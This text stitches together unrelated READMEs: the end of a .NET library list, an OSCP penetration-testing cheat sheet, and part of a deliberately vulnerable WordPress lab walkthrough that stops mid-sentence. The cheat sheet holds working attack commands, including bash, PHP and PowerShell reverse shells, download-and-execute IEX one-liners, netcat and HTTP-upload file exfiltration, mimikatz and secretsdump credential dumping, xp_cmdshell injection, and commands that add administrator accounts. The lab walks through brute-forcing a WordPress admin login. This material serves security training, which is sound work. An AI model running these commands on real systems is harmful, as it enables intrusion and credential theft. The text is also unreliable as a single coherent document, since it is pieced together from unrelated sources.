* [Websocket.Client](https://github.com/Marfusios/websocket-client) - A multiplatform wrapper over native C# class ClientWebSocket with built-in reconnection and error handling.
## Windows Services
* [TopShelf](https://github.com/Topshelf/Topshelf) - An easy service hosting framework for building Windows services using .NET
## WPF
* [Data Grid Extensions](https://github.com/tom-englert/DataGridExtensions) - Modular extensions for the WPF DataGrid control, like filtering, additional column events, extended star-size column behavior, and more...
* [Extended WPF Toolkit™](https://github.com/xceedsoftware/wpftoolkit) - A rich collection of controls, components and utilities for creating WPF applications
* [WPF](https://github.com/dotnet/wpf) - WPF is a .NET Core UI framework for building Windows desktop applications.
## Parser Library
* [Sprache](https://github.com/sprache/Sprache) - A simple, lightweight library for constructing parsers directly in C# code
* [Pidgin](https://github.com/benjamin-hodgson/Pidgin) - A lightweight, fast and flexible parsing library for C#, developed at Stack Overflow
* [FParsec](https://github.com/stephan-tolksdorf/fparsec) - A parser combinator library for F#
* [Superpower](https://github.com/datalust/superpower) - A C# parser construction toolkit with high-quality error reporting
* [CSLY](https://github.com/b3b00/CSLY) - A light embedded C# lexer/parser generator.
## Source Generator
* [M31.FluentAPI](https://github.com/m31coding/M31.FluentAPI) - Effortlessly generate fluent APIs for your C# classes.
* [Supernova.Enum.Generators](https://github.com/EngRajabi/Enum.Source.Generator) - A C# source generator to create an enumeration class from an enum type. With this package, you can work on enums very, very fast without using reflection.
# Other Lists
* [.NET-libraries-that-make-your-life-easier](https://github.com/tallesl/net-libraries-that-make-your-life-easier) - Open Source .NET libraries that make your life easier
* [awesome-LINQ](https://github.com/aloisdg/awesome-linq) - A curated collection of awesome LINQ libraries, tools, and more.
* [awesome-analyzers](https://github.com/Cybermaxs/awesome-analyzers) - A curated list of .NET Compiler Platform ("Roslyn") diagnostic analyzers and code fixes.
* [C# Algorithms, Data Structures](https://github.com/aalhour/C-Sharp-Algorithms) - A list of algorithms and data structures implementations.
* [Awesome .NET Core](https://github.com/thangchung/awesome-dotnet-core) - A collection of awesome .NET core libraries, tools, frameworks and software
* [ASP.NET Core Library and Framework Support](https://github.com/jpsingleton/ANCLAFS) - A list of what .NET libraries and frameworks are currently supported by ASP.NET Core and .NET Core).
* [Awesome .NET Performance](https://github.com/adamsitnik/awesome-dot-net-performance) - A curated list of awesome .NET Performance books, courses, trainings, conference talks, blogs and most inspiring open source contributors.
* [awesome-ddd](https://github.com/heynickc/awesome-ddd) - A curated list of Domain-Driven Design (DDD), Command Query Responsibility Segregation (CQRS), Event Sourcing, and Event Storming resources
* [Awesome Unity](https://github.com/RyanNielson/awesome-unity) - A categorized community-driven collection of high-quality awesome Unity assets, projects, and resources.
* [Awesome Xamarin](https://github.com/XamSome/awesome-xamarin) - A collection of interesting libraries/tools for Xamarin mobile projects.
* [Awesome Roslyn](https://github.com/ironcev/awesome-roslyn) - A curated list of awesome Roslyn books, tutorials, open source projects, analyzers, code fixes, and refactorings.
* [.NET Open Source Developer Projects](https://github.com/Microsoft/dotnet/blob/master/dotnet-developer-projects.md) - This community maintained list showcases .NET open source projects that are useful for any aspect of the development process.
* [Awesome Microservices .NET Core](https://github.com/mjebrahimi/Awesome-Microservices-NetCore) - A collection of awesome training series, articles, videos, books, courses, sample projects, and tools for Microservices in .NET Core.
* [dotnet-console-games](https://github.com/dotnet/dotnet-console-games) - Game examples implemented in .NET console applications.
# Resources
* [Discover .NET](https://discoverdot.net) - Awesome .NET open source and community resources.
* [NuGet Trends](https://nugettrends.com) - Check out NuGet packages adoption and what's trending on NuGet.
* [Weekly C# Digest](https://csharpdigest.net/) - Weekly email newsletter with manually curated top 5 links from the .NET community.
* [ASP.NET Core Developer Roadmap](https://roadmap.sh/aspnet-core) - A complete guide to become a ASP.NET Developer.
|
# JustTryHarder
JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.
(Inspired by PayloadAllTheThings)
Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖
**Hacktoberfest friendly!**
Yes, we are open to Pull Requests for Hacktoberfest! Please ensure its not spam and actually contributes well to this repo. Thanks & happy hacking!
Disclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.
Credit Info:
I have obtained a lot of this info through other Github repos, blogs, sites and more.
I have tried to give as much credit to the original creator as possible, if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz
## Determining the OS of a host via Ping
---
```
ping 10.10.10.110
PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
```
The `TTL` can be used to determine the OS of the host. The three different types of TTL are as shown below:
- TTL=64 = *nix - the hop count so if your getting 61 then there are 3 hops and its a *nix device. Most likely Linux.
- TTL=128 = Windows - again if the TTL is 127 then the hop is 1 and its a Windows box.
- TTL=254 = Solaris/AIX - again if the TTL is 250 then the hop count is 4 and its a Solaris box.
## BOF (WIP)
---
(Typical bad characters include: 0x00, 0x0A, 0x0D)
- Fuzzing
- Finding eip position
- Finding bad chars
- Locating jmp esp
- Generating payload with msfvenom
- Getting reverse shell with netcat
Good BOF resources:
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/
- https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- https://github.com/justinsteven/dostackbufferoverflowgood
- https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/
## Breakouts / Environment Escapes
---
- https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/
- https://sra.io/blog/sitekiosk-breakout/
- https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/
- https://cognosec.com/breaking-out-of-citrix-environment/
- https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/
- https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf
- https://gracefulsecurity.com/citrix-breakout/
## DNS - Zone Transfers
---
- host -t axfr HTB.local 10.10.10.10
- host -l HTB.local 10.10.10.10
- host -l <domain name> <name server>
- dig @<dns server> <domain> axfr
## File Transfers
---
### SMB Transfer
On the Victim machine (Windows)
```
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget Transfer
How to retrieve file(s) from host (inside a reverse shell)
```bash
# Place file you want transferred in /var/www/html/
service apache2 start
# Run on the remote server
# wget http://10.10.10.10/pspy64 # <- for single file
# wget -r http://10.10.10.10/pspy64/ <- for folder
```
### TFTP Transfer
(How to transfer from Kali to Windows)
Using MSF.
Start MSF before these steps:
Inside MSF
1. `use auxiliary/server/tftp`
2. `set TFTPROOT /usr/share/mimikatz/Win32/`
3. `run`
Inside a terminal
4. `tftp -i 10.10.10.10 GET mimikatz.exe`
### NetCat (Windows to Kali)
1. Windows: `nc -nv 10.11.0.61 4444 < bank-account.zip`
2. Linux: `nc -nlvp 4444 > bank-account.zip`
### PowerShell
```ps
Invoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\Users\Victim\exploit.py
```
Without an interactive powershell session:
```ps
# Create wget.ps1
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (Linux -> Linux)
Local Host:
1. `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2. Transfer `encoded.b64` to the remote server via `nc` or otherwise.
Remote Server - Linux:
3. `cat /path/to/encoded.b64 | base64 -d > exploit.py`
Remove Server - Powershell
### Certutil
```
certutil.exe -urlcache -split -f "http://ip.for.kali.box/file-to-get.zip" name-to-save-as.zip
```
### HTTP File Upload (Exfiltration)
Upload:
1. Create upload.php file in attacking machine webroot, `/var/www/html` by default.
```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
2. Create upload directory and set appropriate permissions to allow upload.
```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
3. Upload file from victim machine to attacking machine using PowerShell:
```ps
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')"
```
## Kerberoasting
- `GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>`
- `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
- `impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes`
## LFI / RFI
PHP Reverse Shell:
<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'");
Command Injection:
<?php echo shell_exec(whoami);?>
- For more info on LFI & RFI please refer to the LFI / RFI section at the top of the page ^
## MSSQL / SQLi
- EXEC master..xp_cmdshell 'whoami';
- meh' exec master..xp_cmdshell 'whoami' --
- https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md
- http://pentestmonkey.net/category/cheat-sheet/sql-injection
## Password Cracking
Hashcat
- `hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt`
John The Ripper
- `john --rules --wordlist=/path/to/your/wordlist.txt hash.txt`
## Password Spraying (CrackMapExec)
- `cme smb 10.10.10.10 -u username -d domain -p password`
## Payload Generation
- [NETSEC - Creating Payloads](https://netsec.ws/?p=331)
- [MsfVenom Cheatsheet](http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/_)
- [Metasploit Unleashed Payloads](https://www.offensive-security.com/metasploit-unleashed/payloads/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- Non-staged: netcat
- Staged: multi/handler
## PHP
- [The differences between `exec()`, `shell_exec`, `system()` and `passthru()`](https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1)
## Priv Esc - Linux
# If GCC & wget is installed, the system MIGHT be vulnerable to a kernel exploit
- [Linux Kernel Exploits](https://github.com/SecWiki/linux-kernel-exploits)
- [GTFObins - Break ~~the f\*\*k~~ out of restricted shells](https://gtfobins.github.io)
- GTFO Helper script: https://github.com/dreadnaughtsec/gtfo
- [Linux Exploit Suggester](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)
- [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2)
- [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
- `grep -Ri 'password' .`
- `find / -perm –4000 2>/dev/null`
- `find / -perm -u=s 2>/dev/null`
- `find / -user root -perm -4000 -exec ls -ldb {} \;`
- `which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null`
(then ls -la, look for 777 file permissions).
- Custom SUID binary. Requires code execution as the target user. Example: mysql sys_eval as root.
```
#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>
int main(){
setuid(geteuid());
system("/bin/bash");
return 0;
}
```
## Priv Esc - Windows
- [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
- [Windows Privilege Escalation Guide](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
- [PowerUp / PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc)
- [Powerless - Enumeration Tool](https://github.com/M4ximuss/Powerless)
- [Local Privilege Escalation Workshop](https://github.com/sagishahar/lpeworkshop)
- [Just Another Windows (Enum) Script / JAWS](https://github.com/411Hall/JAWS)
- [Watson](https://github.com/rasta-mouse/Watson)
- [Sherlock](https://github.com/rasta-mouse/Sherlock) (Deprecated)
- [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
- `churrasco -d "net user /add <username> <password>"`
- `churrasco -d "net localgroup administrators <username> /add"`
- `churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"`
## Post Exploitation
1. Mimikatz.exe (run it)
2. privilege::debug
3. sekurlsa::logonpasswords
## Port Forwarding
```
• Local -- Forward local port to remote host.
• Remote -- Forward remote port to local host.
• Dynamic -- Use SOCKS.
Use local if you have a service running on a machine that can be reached from the remote machine, and you want to access it directly from the local machine. After setting up the tunneling you will be able to access the service using your local host IP (127.0.0.1)
Use remote if you have a service that can be reached from the local machine, and you need to make it available to the remote machine. It opens the listening socket on the machine you have used SSH to log into.
Dynamic is like local, but on the client side it behaves like a SOCKS proxy. Use it if you need to connect with a software that expects SOCKS forwarding.
```
Chisel
local system:
```
./chisel server -p 8080 --reverse
```
victim:
```
./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234
```
Plink
- WIP
SSH
1. Generate an SSH key pair on the box being pivoted through to protect your credentials.
```
ssh-keygen
cat ~/.ssh/id_rsa.pub
```
2. Copy the pulic key output from the above command. Add this value and the pivot machine's IP address to the `~/.ssh/authorized_keys` file on your attacking (Kali) machine using the syntax below. If you do not already have this file, simple create a new file and add the contents below.
```
from="[VICTIM_MACHINE_IP_ADDRESS]",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]
```
3. Ensure the SSH service is running on your attacking (Kali) machine.
```
sudo service ssh start
```
4. Initiate SSH call from the box being pivoted through and specify the `id_rsa` private key generated in step 1. This private key may be called something else if you changed the name when generating. Ensure the username and IP address of your attacking machine are correct.
```
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]
```
5. Edit your `/etc/proxychains.conf` file to add the line below.
```
socks4 127.0.0.1 1080
```
6. Prepend the `proxychains` command to pivot through the compromised host using proxy chains. When scanning with `nmap`, be sure to use TCP Connect scans e.g.
```
sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10
```
Additional Notes:
- ssh user@10.10.10.10 -R 1234:127.0.0.1:1234
- ssh -D 1337 -q -C -N -f user@10.10.10.10 (https://ma.ttias.be/socks-proxy-linux-ssh-bypass-content-filters)
## Socks Proxy (using PowerShell)
Local
- vi /etc/proxychains.conf
- socks5 <ip> 9080
- Import-Module .\Invoke-SocksProxy.psm1
- Invoke-SocksProxy -bindPort 9080
- proxychains nmap -sT <ip>
## Port Scanning
TCP
- reconnoitre -t 10.10.10.10 -o . --services --quick --hostnames
- nmap -vvv -sC -sV -p- --min-rate 2000 10.10.10.10
- nmap -sT -p 22,80,110 -A
- nmap -p- -iL ips.txt > TCP_Ports.txt
- nc -v -n -z -w1 10.10.10.10 1-10000
- nmap -p- -iL ips.txt > AllTCPPorts.txt
UDP (can take hours so maybe netstat is a better alternative)
- nmap -sU --top-ports 10000
- nmap -sT -sU -p 22,80,110 -A
- nmap -sT -sU -p- --min-rate 2000
- nmap -p- -sU -iL ips.txt > udp.txt
- nmap -sU -sV -iL ips.txt > alludpports.txt
SNMP
nmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)
SSH
nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt
SSL
nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt
NMAP Bootstrap Report
nmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10
firefox nmap-bootstrap.xsl
## Ping Sweep
# Linux (basic one liners)
- for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
- fping -g 192.168.0.1/24
# Linux (script)
```
for i in `seq 1 255`
do
ping -c1 192.168.125.$i 2>/dev/null 1>&2
if [[ $? -eq 0 ]]
then
echo 192.168.125.$i is up
fi
done
```
# Windows (cmd)
- for /L %i in (1,1,255) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is up.
# Windows (PowerShell)
- $ping = New-Object System.Net.Networkinformation.Ping ; 1..254 | % { $ping.send("10.9.15.$\_", 1) | where status -ne 'TimedOut' | select Address | fl \* }
# Nmap
- nmap -sP 192.168.0.1-254
## Pivoting
- sshuttle -r user@10.10.10.10 10.1.1.0/24
## Remote Desktop
- rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/
- xfreerdp /d:xyz.local /u:username /p:password /v:10.10.10.10 /cert-ignore
## Responder
- responder -I tun0 -wrF
- https://chryzsh.gitbooks.io/darthsidious/content/execution/responder-with-ntlm-relay-and-empire.html
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
## Reverse Shells
Linux
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://awansec.com/reverse-shell.html
- https://www.revshells.com/
Windows
- https://github.com/Dhayalanb/windows-php-reverse-shell
- nc 10.10.10.10 4444 –e cmd.exe
- https://www.revshells.com/
## Shell Upgrading
Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell
## SQL Injection (SQLmap)
- sqlmap -u "http://example.com/test.php?test=test" --level=5 --risk=3 --batch
#### Python
1. python -c 'import pty;spawn("/bin/bash");'
or
1. python3 -c 'import pty;spawn("/bin/bash");'
1. In reverse shell:
```
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
- In Kali
3. stty raw -echo
4. fg
- In reverse shell
5. reset (sometimes optional)
6. export SHELL=bash
7. export TERM=xterm-256color
8. stty rows <num> columns <cols> (optional)
(Sometimes the command will need to be executed: export TERM=xterm)
```
Using socat
```
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
#### Perl
1. perl -e 'exec "/bin/sh";'
2. perl: exec "/bin/sh";
#### Bash
/bin/sh -i
## Show listening ports
- Linux netstat syntax
1. netstat -tulpn | grep LISTEN
- FreeBSD/MacOS X netstat syntax
1. netstat -anp tcp | grep LISTEN
2. netstat -anp udp | grep LISTEN
- OpenBSD netstat syntax
1. netstat -na -f inet | grep LISTEN
2. netstat -nat | grep LISTEN
- Nmap scan syntax
1. sudo nmap -sT -O localhost
2. sudo nmap -sU -O 192.168.2.13 ##[ list open UDP ports ]##
3. sudo nmap -sT -O 192.168.2.13 ##[ list open TCP ports ]##
## SMB - Enumeration
- https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
- smbmap -H 10.10.10.10
- smbclient -L 10.0.0.10
- smbclient //10.10.10.10/share$
## SMB - Impacket
- Impacket's PSEXEC (After creating a remote port fwd)
/usr/share/doc/python-impacket/examples/psexec.py user@10.10.10.10
Password: (password)
[*] Trying protocol 445/SMB...
- Impacket's SMBServer (For File Transfer)
1. cd /usr/share/windows-binaries
2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
3. \\\10.10.10.10\a\mimikatz.exe
## SMTP Enumeration
https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt
## ICMP Injection
1. ping -n 3 10.10.10.10
2. tcpdump -i tun0 icmp
## VMware (not going full screen)
`systemctl restart open-vm-tools.service`
## Web Servers:
- python -m SimpleHTTPServer 80
- python3 -m http.server 80
- ngrok http "file:///C:\Users\sinfulz\Public Folder"
- php -S 0.0.0.0:80
## Web Scanning:
Web Scanning with extensions
Linux (Example web server might be Apache)
`gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401`
Windows (Example web server might be IIS)
`gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401`
Linux (Example web server might be Apache)
`python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50`
Windows (Example web server might be IIS)
`python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50`
HTTP
`gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69`
HTTPS
`gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69`
(in some cases --wildcard will need to be used instead of -k)
Nikto
`nikto -h 10.10.10.10 -p 80`
Nikto HTTPS
``nikto -h 10.10.10.10 -p 443```
WFuzz
`wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt`
## Web Shells
- https://github.com/Arrexel/phpbash
- https://github.com/flozz/p0wny-shell
## WordPress
- https://forum.top-hat-sec.com/index.php?topic=5758.0
## Windows Framework / Powershell
bypass PowerShell execution policy
- Bypassing execution policy and executing a script:
`powershell -ExecutionPolicy ByPass -File script.ps1`
---
- https://github.com/samratashok/nishang
- https://github.com/rasta-mouse/Sherlock
- Reverse Powershell: (sometimes powershell or echo may need to be infront of the string and sometimes quotes may be needed, e.g. powershell IEX or powershell "IEX..etc" or echo IEX).
```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
- If one has a Command Prompt shell, this will grab PowerUp from a local web server and run it on the compromised shell:
```
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -
```
```
IEX(New-object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1')
```
```
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever"
```
- Reverse Powershell using mssql:
```
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.10.10/Nishang-ReverseShell.ps1\")
```
- File transfer with PowerShell:
```
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')`
```
## Windows Post Exploitation Commands
- WMIC USERACCOUNT LIST BRIEF
- net user
- net localgroup Users
- net localgroup Administrators
- net user USERNAME NEWPASS /add
- net user "USER NAME" NEWPASS /add
- net localgroup administrators USERNAME /add
Writeable Directories
# Windows
---
list from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
The following folders are by default writable by normal users (depends on Windows version - This is from W10 1803)
```
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```
# Linux
To find World Writeable Directories in Linux use the command:
`find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print`
## Todo List:
- Improve the readability of the cheatsheet
- Fill in the empty sections
- Remove unnecessary sections
- Integrate the files in the repo into the cheatsheet
- Migrate to GitBook
- Include screenshots/gifs into the cheatsheet if needed
- Add a Table of Contents similar to PayloadAllTheThings' repos
## Thank you:
# Thanks to these people for including my cheatsheet on their website/blog:
- https://khaoticdev.net/cheatsheets/#collections
- https://www.facebook.com/ncybersec/posts/1541830509321001
- https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466
- https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat
- https://xn4k.github.io/pentest/PWK-course-&-the-OSCP-Exam-Cheatsheet/
- https://opensourcelibs.com/libs/pentesting-tools
- https://gitmemory.com/brhannah
- https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/
- https://pythonlang.dev/category/oscp/
|
# Vulnerable Wordpress Misconfig
<p align="center">
<img src="images/banner.png"/>
</p>
This is a simple Wordpress web application that contains an example of a Security Misconfiguration vulnerability and its main goal is to describe how a malicious user could exploit multiple Security Misconfiguration vulnerabilities intentionally installed on SecWeb.
## Index
- [Definition](#what-is-security-misconfiguration)
- [Setup](#setup)
- [Attack narrative](#attack-narrative)
- [Objectives](#secure-this-app)
- [Solutions](#pr-solutions)
- [Contributing](#contributing)
## What is Security Misconfiguration?
Security misconfiguration can happen at any level of an application stack, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.
The main goal of this app is to discuss how **Security Misconfiguration** vulnerabilities can be exploited and to encourage developers to send secDevLabs Pull Requests on how they would mitigate these flaws.
## Setup
To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a5/misconfig-wordpress
```
```sh
make install
```
Then simply visit [localhost:8000][app] ! 😆
## Get to know the app 📄
To properly understand how this application works, you can try to:
- Visit its homepage!
## Attack narrative
Now that you know the purpose of this app, what could go wrong? The following section describes how an attacker could identify and eventually find sensitive information about the app or its users. We encourage you to follow these steps and try to reproduce them on your own to better understand the attack vector! 😜
### 👀
#### Verbose error message allows for username enumeration
It's possible to reach the site through the HTTP port 8000, as shown by the image below:
<p align="center">
<img src="images/banner.png"/>
</p>
Having a closer look at what's written bellow `SECWEB` we have a sign that the site might be using the WordPress CMS. We can confirm that suspicion by trying to access the `/wp-admin` page. As we can see from the image below, our suspicion is confirmed:
<p align="center">
<img src="images/attack1.png"/>
</p>
An attacker could try to log in with the username: `admin` and realize, through the error message, that `admin` is a valid user, as depicted by the image below:
<p align="center">
<img src="images/attack2.png"/>
</p>
### 🔥
At this moment, an attacker could use [Burp Suite](https://portswigger.net/burp) to perform a brute force attack using this [wordlist] (if you need any help setting up your proxy you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to Intruder, as shown below:
<p align="center">
<img src="images/attack10.png"/>
</p>
In the `Positions` tab, all fields must be cleared first via the `Clear §` button. To set `pwd` to change according to each password from our dictionary wordlist, simply click on `Add §` button after selecting it:
<p align="center">
<img src="images/attack11.png"/>
</p>
If a valid password is found, the application may process new cookies and eventually redirect the flow to other pages. To guarantee that the brute force attack follows this behavior, set `Always` into `Follow Redirections` options in the `Options` tab, as shown below:
<p align="center">
<img src="images/attack13.png"/>
</p>
In `Payloads` tab, simply choose the wordlist from `Load...` option and then the attack may be performed via the `Start attack` button:
<p align="center">
<img src="images/attack12.png"/>
</p>
After sending at around 200 requests to try and obtain a valid admin password, it is possible to see from the image below that the app redirected us when the password `password` was used, thus giving us evidence that it might be the `admin` password.
<p align="center">
<img src="images/attack3.png"/>
</p>
The suspicion was confirmed when trying to log in with these credentials. As shown below:
<p align="center">
<img src="images/attack3.1.png"/>
</p>
---
### 👀
#### Outdated WordPress is vulnerable to an authenticated arbitrary file deletion
Now that we know we're dealing with a WordPress, we can use the [WPScan] tool to perform a sweep in the app in search for known vulnerabilities. The following command can be used to install it:
```sh
brew install wpscan
```
And then use this command to start a new simple scan:
```sh
wpscan -u localhost:8000
```
<p align="center">
<img src="images/attack4.png"/>
</p>
### 🔥
As seen from the image above, the tool found out that the CMS version is outdated and vulnerable to an Authenticated Arbitrary File Deletion. By using [searchsploit] tool an attacker could find a [malicious code] to exploit this vulnerability.
To install this tool, simply type the following in your OSX terminal:
```sh
⚠️ 'The next command will install several exploit codes in your system and many of them may trigger antiviruses alerts'
brew install exploitdb
```
Then simply search for the version of the CMS found:
```sh
searchsploit wordpress 4.9.6
```
<p align="center">
<img src="images/attack5.png"/>
</p>
---
## 👀
#### Security misconfiguration allows for a browseable directory on the server
By having another look at the results from [WPScan], it's possible to see that the tool found a browseable directory in the app: `/wp-content/uploads/`, as we can see from the image below:
<p align="center">
<img src="images/attack6.png"/>
</p>
## 🔥
We can confirm that the directory is browseable by accessing it through a web browser, as shown by the following image:
<p align="center">
<img src="images/attack7.png"/>
</p>
---
## 👀
#### Misconfigured headers give away unnecessary information about the server
Using [Nikto] tool to perform a security check scan, it's possible to see that there are multiple points of attention regarding security headers.
To install it, you can use the following command in your OSX terminal:
```sh
brew install nikto
```
Then scan the web app using:
```sh
nikto -h http://localhost:8000/
```
<p align="center">
<img src="images/attack8.png"/>
</p>
Now, by doing the following curl command to check the HTTP headers of the application, we can confirm that it indeed exposes the PHP version installed, as shown by the image below:
<p align="center">
